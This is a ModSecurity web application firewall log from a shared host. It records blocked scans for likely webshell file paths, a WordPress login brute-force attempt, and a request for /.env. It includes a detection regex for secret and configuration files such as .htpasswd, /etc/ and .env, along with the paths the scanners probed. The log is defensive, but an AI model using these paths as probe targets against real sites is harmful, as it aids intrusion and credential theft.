[Tue May 26 19:19:49.464297 2026] [security2:error] [pid 37506:tid 37733] [client 20.226.249.33:30743] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/aa.php"] [unique_id "ahWk_QKctTPx5f8aOzkNxAAAAGE"]
[Tue May 26 19:19:49.464389 2026] [security2:error] [pid 37506:tid 37733] [client 20.226.249.33:30743] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/aa.php"] [unique_id "ahWk_QKctTPx5f8aOzkNxAAAAGE"]
[Tue May 26 19:19:49.835484 2026] [security2:error] [pid 37506:tid 37669] [client 20.226.249.33:12362] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/server.php"] [unique_id "ahWk_QKctTPx5f8aOzkN1AAAACE"]
[Tue May 26 19:19:49.835585 2026] [security2:error] [pid 37506:tid 37669] [client 20.226.249.33:12362] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/server.php"] [unique_id "ahWk_QKctTPx5f8aOzkN1AAAACE"]
[Tue May 26 19:19:50.295789 2026] [security2:error] [pid 37506:tid 37729] [client 20.226.249.33:36161] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-includes/index.php"] [unique_id "ahWk_gKctTPx5f8aOzkN8wAAAF0"]
[Tue May 26 19:19:50.295915 2026] [security2:error] [pid 37506:tid 37729] [client 20.226.249.33:36161] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-includes/index.php"] [unique_id "ahWk_gKctTPx5f8aOzkN8wAAAF0"]
[Tue May 26 19:19:50.655587 2026] [security2:error] [pid 37506:tid 37742] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWk_gKctTPx5f8aOzkN7QAAAGo"]
[Tue May 26 19:19:51.296594 2026] [security2:error] [pid 37506:tid 37664] [client 20.226.249.33:36170] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-content/themes/admin.php"] [unique_id "ahWk_wKctTPx5f8aOzkOIAAAABw"]
[Tue May 26 19:19:51.296738 2026] [security2:error] [pid 37506:tid 37664] [client 20.226.249.33:36170] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-content/themes/admin.php"] [unique_id "ahWk_wKctTPx5f8aOzkOIAAAABw"]
[Tue May 26 19:19:52.013054 2026] [security2:error] [pid 37506:tid 37733] [client 20.226.249.33:9128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/admin.php"] [unique_id "ahWlAAKctTPx5f8aOzkORgAAAGE"]
[Tue May 26 19:19:52.013161 2026] [security2:error] [pid 37506:tid 37733] [client 20.226.249.33:9128] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-content/plugins/admin.php"] [unique_id "ahWlAAKctTPx5f8aOzkORgAAAGE"]
[Tue May 26 19:19:52.411320 2026] [security2:error] [pid 37506:tid 37760] [client 20.226.249.33:42055] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/f.php"] [unique_id "ahWlAAKctTPx5f8aOzkOWQAAAHw"]
[Tue May 26 19:19:52.411390 2026] [security2:error] [pid 37506:tid 37760] [client 20.226.249.33:42055] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/f.php"] [unique_id "ahWlAAKctTPx5f8aOzkOWQAAAHw"]
[Tue May 26 19:19:52.811892 2026] [security2:error] [pid 37506:tid 37749] [client 20.226.249.33:30731] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-includes/blocks/block/"] [unique_id "ahWlAAKctTPx5f8aOzkOdwAAAHE"]
[Tue May 26 19:19:53.014318 2026] [security2:error] [pid 37506:tid 37755] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlAAKctTPx5f8aOzkOYwAAAHc"]
[Tue May 26 19:19:53.042001 2026] [security2:error] [pid 37506:tid 37657] [client 45.131.46.221:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWlAAKctTPx5f8aOzkOewAAABU"], referer: https://www.anujtradingco.com/
[Tue May 26 19:19:53.516526 2026] [security2:error] [pid 37506:tid 37740] [client 20.226.249.33:26958] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWlAQKctTPx5f8aOzkOnAAAAGg"]
[Tue May 26 19:19:53.693265 2026] [security2:error] [pid 37506:tid 37741] [client 20.226.249.33:30731] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-includes/js/tinymce/skins/wordpress/images/index.php"] [unique_id "ahWlAQKctTPx5f8aOzkOoQAAAGk"]
[Tue May 26 19:19:53.693393 2026] [security2:error] [pid 37506:tid 37741] [client 20.226.249.33:30731] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-includes/js/tinymce/skins/wordpress/images/index.php"] [unique_id "ahWlAQKctTPx5f8aOzkOoQAAAGk"]
[Tue May 26 19:19:53.737970 2026] [security2:error] [pid 37506:tid 37667] [client 114.119.159.76:49417] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/wp-content/uploads/2017/08/15132-uai-258x193.jpg"] [unique_id "ahWlAQKctTPx5f8aOzkOogAAAB8"], referer: https://www.anujtradingco.com/wp-content/uploads/2017/08/15132-uai-258x193.jpg
[Tue May 26 19:19:54.053391 2026] [security2:error] [pid 37506:tid 37695] [client 20.226.249.33:36220] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-includes/admin.php"] [unique_id "ahWlAgKctTPx5f8aOzkOsgAAADs"]
[Tue May 26 19:19:54.053498 2026] [security2:error] [pid 37506:tid 37695] [client 20.226.249.33:36220] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-includes/admin.php"] [unique_id "ahWlAgKctTPx5f8aOzkOsgAAADs"]
[Tue May 26 19:19:54.201603 2026] [security2:error] [pid 37506:tid 37690] [client 45.131.46.221:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWlAgKctTPx5f8aOzkOtQAAADY"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1135507&moderation-hash=a60093699166c1bb92a1b77248c9412a
[Tue May 26 19:19:54.689767 2026] [security2:error] [pid 37506:tid 37720] [client 20.226.249.33:29548] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colors/blue/"] [unique_id "ahWlAgKctTPx5f8aOzkO1AAAAFQ"]
[Tue May 26 19:19:54.871155 2026] [security2:error] [pid 37506:tid 37653] [client 20.226.249.33:26958] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahWlAgKctTPx5f8aOzkO3gAAABE"]
[Tue May 26 19:19:55.053167 2026] [security2:error] [pid 37506:tid 37667] [client 20.226.249.33:29548] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/bgymj.php"] [unique_id "ahWlAwKctTPx5f8aOzkO5wAAAB8"]
[Tue May 26 19:19:55.053246 2026] [security2:error] [pid 37506:tid 37667] [client 20.226.249.33:29548] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/bgymj.php"] [unique_id "ahWlAwKctTPx5f8aOzkO5wAAAB8"]
[Tue May 26 19:19:55.508497 2026] [security2:error] [pid 37506:tid 37664] [client 20.226.249.33:12354] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/term.php"] [unique_id "ahWlAwKctTPx5f8aOzkPBQAAABw"]
[Tue May 26 19:19:55.508606 2026] [security2:error] [pid 37506:tid 37664] [client 20.226.249.33:12354] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/term.php"] [unique_id "ahWlAwKctTPx5f8aOzkPBQAAABw"]
[Tue May 26 19:19:55.842741 2026] [security2:error] [pid 37506:tid 37679] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlAwKctTPx5f8aOzkO-gAAACs"]
[Tue May 26 19:19:56.140062 2026] [security2:error] [pid 37506:tid 37688] [client 20.226.249.33:17152] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-admin/js/index.php"] [unique_id "ahWlBAKctTPx5f8aOzkPHQAAADQ"]
[Tue May 26 19:19:56.140192 2026] [security2:error] [pid 37506:tid 37688] [client 20.226.249.33:17152] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-admin/js/index.php"] [unique_id "ahWlBAKctTPx5f8aOzkPHQAAADQ"]
[Tue May 26 19:19:56.744691 2026] [security2:error] [pid 37506:tid 37656] [client 20.226.249.33:29953] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-admin/css/index.php"] [unique_id "ahWlBAKctTPx5f8aOzkPOwAAABQ"]
[Tue May 26 19:19:56.744789 2026] [security2:error] [pid 37506:tid 37656] [client 20.226.249.33:29953] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-admin/css/index.php"] [unique_id "ahWlBAKctTPx5f8aOzkPOwAAABQ"]
[Tue May 26 19:19:57.159601 2026] [security2:error] [pid 37506:tid 37713] [client 20.226.249.33:30747] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/classwithtostring.php"] [unique_id "ahWlBQKctTPx5f8aOzkPUQAAAE0"]
[Tue May 26 19:19:57.159741 2026] [security2:error] [pid 37506:tid 37713] [client 20.226.249.33:30747] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/classwithtostring.php"] [unique_id "ahWlBQKctTPx5f8aOzkPUQAAAE0"]
[Tue May 26 19:19:57.567132 2026] [security2:error] [pid 37506:tid 37644] [client 20.226.249.33:2686] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/main.php"] [unique_id "ahWlBQKctTPx5f8aOzkPZQAAAAg"]
[Tue May 26 19:19:57.567237 2026] [security2:error] [pid 37506:tid 37644] [client 20.226.249.33:2686] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/main.php"] [unique_id "ahWlBQKctTPx5f8aOzkPZQAAAAg"]
[Tue May 26 19:19:58.079981 2026] [security2:error] [pid 37506:tid 37650] [client 20.226.249.33:29522] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-content/admin.php"] [unique_id "ahWlBgKctTPx5f8aOzkPgAAAAA4"]
[Tue May 26 19:19:58.080090 2026] [security2:error] [pid 37506:tid 37650] [client 20.226.249.33:29522] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-content/admin.php"] [unique_id "ahWlBgKctTPx5f8aOzkPgAAAAA4"]
[Tue May 26 19:19:58.579190 2026] [security2:error] [pid 37506:tid 37723] [client 20.226.249.33:17210] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/goods.php"] [unique_id "ahWlBgKctTPx5f8aOzkPmwAAAFc"]
[Tue May 26 19:19:58.579334 2026] [security2:error] [pid 37506:tid 37723] [client 20.226.249.33:17210] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/goods.php"] [unique_id "ahWlBgKctTPx5f8aOzkPmwAAAFc"]
[Tue May 26 19:19:58.610485 2026] [security2:error] [pid 37506:tid 37576] [remote 121.200.216.55:54174] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWlBgKctTPx5f8aOzkPkQAAWEU"]
[Tue May 26 19:19:58.708378 2026] [security2:error] [pid 37506:tid 37677] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlBgKctTPx5f8aOzkPiQAAACk"]
[Tue May 26 19:19:58.973328 2026] [security2:error] [pid 37506:tid 37759] [client 20.226.249.33:29563] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/w.php"] [unique_id "ahWlBgKctTPx5f8aOzkPrAAAAHs"]
[Tue May 26 19:19:58.973435 2026] [security2:error] [pid 37506:tid 37759] [client 20.226.249.33:29563] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/w.php"] [unique_id "ahWlBgKctTPx5f8aOzkPrAAAAHs"]
[Tue May 26 19:19:59.426927 2026] [security2:error] [pid 37506:tid 37742] [client 20.226.249.33:22340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/file5.php"] [unique_id "ahWlBwKctTPx5f8aOzkPyAAAAGo"]
[Tue May 26 19:19:59.427027 2026] [security2:error] [pid 37506:tid 37742] [client 20.226.249.33:22340] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/file5.php"] [unique_id "ahWlBwKctTPx5f8aOzkPyAAAAGo"]
[Tue May 26 19:19:59.802773 2026] [security2:error] [pid 37506:tid 37731] [client 20.226.249.33:45196] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-includes/Text/Diff/Engine/index.php"] [unique_id "ahWlBwKctTPx5f8aOzkP0wAAAF8"]
[Tue May 26 19:19:59.802908 2026] [security2:error] [pid 37506:tid 37731] [client 20.226.249.33:45196] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp-includes/Text/Diff/Engine/index.php"] [unique_id "ahWlBwKctTPx5f8aOzkP0wAAAF8"]
[Tue May 26 19:20:00.198871 2026] [security2:error] [pid 37506:tid 37744] [client 20.226.249.33:22366] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahWlCAKctTPx5f8aOzkP8QAAAGw"]
[Tue May 26 19:20:00.198965 2026] [security2:error] [pid 37506:tid 37744] [client 20.226.249.33:22366] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahWlCAKctTPx5f8aOzkP8QAAAGw"]
[Tue May 26 19:20:00.263033 2026] [security2:error] [pid 37506:tid 37595] [remote 216.73.216.30:40492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWlCAKctTPx5f8aOzkP9QAAOFg"]
[Tue May 26 19:20:00.597384 2026] [security2:error] [pid 37506:tid 37722] [client 20.226.249.33:2317] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahWlCAKctTPx5f8aOzkP_QAAAFY"]
[Tue May 26 19:20:00.597507 2026] [security2:error] [pid 37506:tid 37722] [client 20.226.249.33:2317] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahWlCAKctTPx5f8aOzkP_QAAAFY"]
[Tue May 26 19:20:00.667295 2026] [security2:error] [pid 37506:tid 37736] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWlCAKctTPx5f8aOzkP9AAAAGQ"]
[Tue May 26 19:20:00.915661 2026] [security2:error] [pid 37506:tid 37749] [client 176.65.139.231:54774] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "operatives.org.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWlCAKctTPx5f8aOzkQCgAAAHE"]
[Tue May 26 19:20:00.986245 2026] [security2:error] [pid 37506:tid 37686] [client 20.226.249.33:2306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.249.226.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/Ov-Simple1.php"] [unique_id "ahWlCAKctTPx5f8aOzkQDgAAADI"]
[Tue May 26 19:20:00.986343 2026] [security2:error] [pid 37506:tid 37686] [client 20.226.249.33:2306] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.marriage4hindu.com.md-74.webhostbox.net"] [uri "/Ov-Simple1.php"] [unique_id "ahWlCAKctTPx5f8aOzkQDgAAADI"]
